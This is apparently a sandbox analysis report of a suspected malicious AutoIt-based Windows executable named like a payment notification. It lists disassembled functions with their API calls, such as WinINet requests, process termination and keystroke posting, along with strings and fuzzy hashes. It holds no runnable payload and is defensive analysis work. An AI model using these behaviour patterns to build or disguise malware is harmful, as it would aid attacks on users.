Line %d (File "%s"):, xrefs: 009A366B

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 86ce6be84715e5dddaa8ce90fd8fa407b1f6ee3ddc92d3237fcd73759032849d
Instruction ID: 387f590d350f25203972d7678a5f61188243bc772d684095f83054b8bf2b1b0b
Opcode Fuzzy Hash: 86ce6be84715e5dddaa8ce90fd8fa407b1f6ee3ddc92d3237fcd73759032849d
Instruction Fuzzy Hash: 49514B72C40209BBDF15EBA0CC46FEEBB78AF85304F548125F105721A1EB715A99DFA1

Function 009C8B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00949BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00949BB2

Part of subcall function 0094912D: GetCursorPos.USER32(?), ref: 00949141
Part of subcall function 0094912D: ScreenToClient.USER32(00000000,?), ref: 0094915E
Part of subcall function 0094912D: GetAsyncKeyState.USER32(00000001), ref: 00949183
Part of subcall function 0094912D: GetAsyncKeyState.USER32(00000002), ref: 0094919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 009C8B6B
ImageList_EndDrag.COMCTL32 ref: 009C8B71
ReleaseCapture.USER32 ref: 009C8B77
SetWindowTextW.USER32(?,00000000), ref: 009C8C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 009C8C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 009C8CFF

Strings

@GUI_DROPID, xrefs: 009C8C51
@GUI_DRAGFILE, xrefs: 009C8C9A

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 59a0721933d26c9db48bfc507710dc36a70860d60d2ead30cfcd9cd97fb22a18
Instruction ID: f268f3cda4708143a99da70b8c13123c4e665db90feef946d13cb6bfc5111c9e
Opcode Fuzzy Hash: 59a0721933d26c9db48bfc507710dc36a70860d60d2ead30cfcd9cd97fb22a18
Instruction Fuzzy Hash: 44517A70508304AFD704DF64DC96FAA77E4FB88754F40062DF996A72E1CB709945CB62

Function 009AC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009AC272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009AC29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009AC2CA
GetLastError.KERNEL32 ref: 009AC322
SetEvent.KERNEL32(?), ref: 009AC336
InternetCloseHandle.WININET(00000000), ref: 009AC341

Strings

, xrefs: 009AC2BB

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 9d9980f665a269fecbfad7d4ee71dd058697dd49ac78a6f99ec389ee3b806844
Instruction ID: 98ef8f969068425169f84fb23835d517b98745279919acce3ea12638dcdb597d
Opcode Fuzzy Hash: 9d9980f665a269fecbfad7d4ee71dd058697dd49ac78a6f99ec389ee3b806844
Instruction Fuzzy Hash: 093150F1504604AFDB219F659C88EBB7BFCEB4A744F14851EF44ADA200DB34DD059BA1

Function 0099989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00973AAF,?,?,Bad directive syntax error,009CCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 009998BC
LoadStringW.USER32(00000000,?,00973AAF,?), ref: 009998C3

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00999987

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 009998F1
., xrefs: 0099996D
Error: , xrefs: 00999955
Line %d:, xrefs: 00999912
Line %d (File "%s"):, xrefs: 0099992D

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: db5d4c50a301f2e64c729eebd3d7f96e31b8f4451b70d2ae68bf7ef91f9b228d
Instruction ID: d6ad68a5fb80c9ba261f6607814285b2296439b21f9654002df5a0322bc39ba4
Opcode Fuzzy Hash: db5d4c50a301f2e64c729eebd3d7f96e31b8f4451b70d2ae68bf7ef91f9b228d
Instruction Fuzzy Hash: D721593284421AABCF15AF94CC0AFEE7779FF58304F048429F619660A2EB719A18DB10

Function 0099209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 009920AB
GetClassNameW.USER32(00000000,?,00000100), ref: 009920C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0099214D

Strings

largeicons, xrefs: 009920E1
list, xrefs: 0099212F
details, xrefs: 009920FB
SHELLDLL_DefView, xrefs: 009920CC
smallicons, xrefs: 00992115

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 269e871680f04c87417ba834e5f942d1f91a6add557ae564f6efb31040c6ad27
Instruction ID: 3b0f658ed3287aa13d190e74647cd16e0fc8366fdf904b1b38fcc9b28a778836
Opcode Fuzzy Hash: 269e871680f04c87417ba834e5f942d1f91a6add557ae564f6efb31040c6ad27
Instruction Fuzzy Hash: 1811297668C70BBAFE216329DD0BDF6379CCB4532EF210016FB04A50E2FE65A8555714

Function 00968D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f608baef59ada837ab2565563bcb603b64c0c0cf4e06db2e17d86a641b1f9245
Instruction ID: ac636cecc60d4ca8d496523675268625048dc35691c3b8f4eaffa7fae14bb32e
Opcode Fuzzy Hash: f608baef59ada837ab2565563bcb603b64c0c0cf4e06db2e17d86a641b1f9245
Instruction Fuzzy Hash: FEC103B4E04249AFCF11DFA8D851BAEBFB8BF49310F044199F815A7392CB349942DB61

Function 0096CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0096CEB7
_free.LIBCMT ref: 0096CF22
_free.LIBCMT ref: 0096CF48
_free.LIBCMT ref: 0096CF71
_free.LIBCMT ref: 0096CFA9
_free.LIBCMT ref: 0096CFDA
_free.LIBCMT ref: 0096D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0096D09C
_free.LIBCMT ref: 0096D0B5

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 22487f3ae542e629b02c111c1cd534f8cc1c926e53da02f16e5b2a85f4ba9d13
Instruction ID: 498735d4a436202da1e0baeed447e33c6a2b1e1924e1d48f5966484834805d0e
Opcode Fuzzy Hash: 22487f3ae542e629b02c111c1cd534f8cc1c926e53da02f16e5b2a85f4ba9d13
Instruction Fuzzy Hash: A56178B1A05305AFDF25EFF49C81B7E7BA9EF45360F04416DF984A7281DA369D0287A0

Function 009C50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 009C5186
ShowWindow.USER32(?,00000000), ref: 009C51C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 009C51CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 009C51D1

Part of subcall function 009C6FBA: DeleteObject.GDI32(00000000), ref: 009C6FE6

GetWindowLongW.USER32(?,000000F0), ref: 009C520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009C521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009C524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 009C5287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 009C5296

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 63ce5e7529e0c262fea61b39a161e7fcf145152e8d66c667606f6ebfb9f8f933
Instruction ID: f542230949ab13cf14dafeec4feab01bd4ce0a3fffe9aa9af402a18dd5ae5bc6
Opcode Fuzzy Hash: 63ce5e7529e0c262fea61b39a161e7fcf145152e8d66c667606f6ebfb9f8f933
Instruction Fuzzy Hash: 7051BE70E54A08BEEF209F24CC49FD97BA9EB45324F594009F625962E1C375B9C0DB42

Function 00948B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00986890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009868A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009868B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 009868D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009868F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00948874,00000000,00000000,00000000,000000FF,00000000), ref: 00986901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0098691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00948874,00000000,00000000,00000000,000000FF,00000000), ref: 0098692D

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 94e13247e67d941abf807a1f65d52354401c1d870512bf2202f602a9a3bc014a
Instruction ID: a19b79b76a0b8c50f08c5d996768a776624bb0cfa7d57235eaa2fb1657fa2037
Opcode Fuzzy Hash: 94e13247e67d941abf807a1f65d52354401c1d870512bf2202f602a9a3bc014a
Instruction Fuzzy Hash: 2D516AB0A00209EFDB20DF24CC95FAA7BB9FB88750F104518F9569B2E0DB71E991DB50

Function 009AC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009AC182
GetLastError.KERNEL32 ref: 009AC195
SetEvent.KERNEL32(?), ref: 009AC1A9

Part of subcall function 009AC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009AC272
Part of subcall function 009AC253: GetLastError.KERNEL32 ref: 009AC322
Part of subcall function 009AC253: SetEvent.KERNEL32(?), ref: 009AC336
Part of subcall function 009AC253: InternetCloseHandle.WININET(00000000), ref: 009AC341

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: b890ed2b0ac5de9543828267067f6593f4dc59f5a556f39019025dfdd42da92f
Instruction ID: d1cdc2cda4d7fe650d658a440417db9bd37bc24308c7f427dce8961839c429a7
Opcode Fuzzy Hash: b890ed2b0ac5de9543828267067f6593f4dc59f5a556f39019025dfdd42da92f
Instruction Fuzzy Hash: FC31ACB1604605BFDB219FA5DD08B66BBFCFF5A300B04441EF96A8A610D735E810EBE0

Function 009925A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00993A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00993A57
Part of subcall function 00993A3D: GetCurrentThreadId.KERNEL32 ref: 00993A5E
Part of subcall function 00993A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009925B3), ref: 00993A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 009925BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009925DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 009925DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 009925E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00992601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00992605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0099260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00992623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00992627

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 858cd3213c87317661d65d065d3ba908f13f578bbc455542a78a988be4903cec
Instruction ID: 5ad28064d4c1e990b5e65b7679ca48f5720fc1b1d3dcab873907ef4859c293eb
Opcode Fuzzy Hash: 858cd3213c87317661d65d065d3ba908f13f578bbc455542a78a988be4903cec
Instruction Fuzzy Hash: 4F01D870B98210BBFB1067699C8AF593F59DB8EB11F110001F318AE1D1C9E114449B69

Function 00991803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00991449,?,?,00000000), ref: 0099180C
HeapAlloc.KERNEL32(00000000,?,00991449,?,?,00000000), ref: 00991813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00991449,?,?,00000000), ref: 00991828
GetCurrentProcess.KERNEL32(?,00000000,?,00991449,?,?,00000000), ref: 00991830
DuplicateHandle.KERNEL32(00000000,?,00991449,?,?,00000000), ref: 00991833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00991449,?,?,00000000), ref: 00991843
GetCurrentProcess.KERNEL32(00991449,00000000,?,00991449,?,?,00000000), ref: 0099184B
DuplicateHandle.KERNEL32(00000000,?,00991449,?,?,00000000), ref: 0099184E
CreateThread.KERNEL32(00000000,00000000,00991874,00000000,00000000,00000000), ref: 00991868

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 825d105c78c89d3454de43d9e96fa17e2522449393f0673bec6f349c44a78bbe
Instruction ID: 454e627d11c986b40bb581c079bff2541194a349d21b9bb7767594f5edec7cb4
Opcode Fuzzy Hash: 825d105c78c89d3454de43d9e96fa17e2522449393f0673bec6f349c44a78bbe
Instruction Fuzzy Hash: 4601BBB5654348BFE710ABA6DC4DF6B3FACEB89B11F044411FA09DB1A1CA749800DB20

Function 009BA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0099D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0099D501
Part of subcall function 0099D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0099D50F
Part of subcall function 0099D4DC: CloseHandle.KERNEL32(00000000), ref: 0099D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 009BA16D
GetLastError.KERNEL32 ref: 009BA180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 009BA1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 009BA268
GetLastError.KERNEL32(00000000), ref: 009BA273
CloseHandle.KERNEL32(00000000), ref: 009BA2C4

Strings

SeDebugPrivilege, xrefs: 009BA18F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 04cfb9688b8174424e955f6299026956af06cc2cae112289840d6c49e4ab91d5
Instruction ID: 290186469791532ec0851670e62306f1aa5b02f66a22ebc2ce39ddfcdb6bd8e0
Opcode Fuzzy Hash: 04cfb9688b8174424e955f6299026956af06cc2cae112289840d6c49e4ab91d5
Instruction Fuzzy Hash: 2161A270208242AFD710DF19C594F55BBE5AF84328F18849CE4664B7A3C776ED45CF92

Function 009C3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 009C3925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 009C393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009C3954
_wcslen.LIBCMT ref: 009C3999
SendMessageW.USER32(?,00001057,00000000,?), ref: 009C39C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 009C39F4

Strings

SysListView32, xrefs: 009C38F7

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: be49287dde4709de4dad6ef252cf8835f562ce2a69f043ba007976c76f7df945
Instruction ID: d1a0d02afb3f76ac8b29d762a9f2d177329590c3f773761b7affcc55b1a6663f
Opcode Fuzzy Hash: be49287dde4709de4dad6ef252cf8835f562ce2a69f043ba007976c76f7df945
Instruction Fuzzy Hash: DE41C371E00219EBEF219F64CC45FEA7BA9EF48354F10852AF948E7281D7719E84CB90

Function 0099BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0099BCFD
IsMenu.USER32(00000000), ref: 0099BD1D
CreatePopupMenu.USER32 ref: 0099BD53
GetMenuItemCount.USER32(01044EA0), ref: 0099BDA4
InsertMenuItemW.USER32(01044EA0,?,00000001,00000030), ref: 0099BDCC

Strings

0, xrefs: 0099BCA8
2, xrefs: 0099BD37

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: f4757310c9e76a08a6c8a08d7f248ba6b1e059292a5c5bb2d4bee8733335fc77
Instruction ID: 32a90354bb64cd20c5d89cea6c2152ae7c31f5ab4d0ab40b029176ebda24167a
Opcode Fuzzy Hash: f4757310c9e76a08a6c8a08d7f248ba6b1e059292a5c5bb2d4bee8733335fc77
Instruction Fuzzy Hash: 8151DFB0A042099BEF10CFACEA88BAEBBF8BF95314F144519F505E72D0D7799941CB61

Function 0099C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0099C913

Strings

blank, xrefs: 0099C895
question, xrefs: 0099C8CC
warning, xrefs: 0099C8FC
info, xrefs: 0099C8B4
stop, xrefs: 0099C8E4

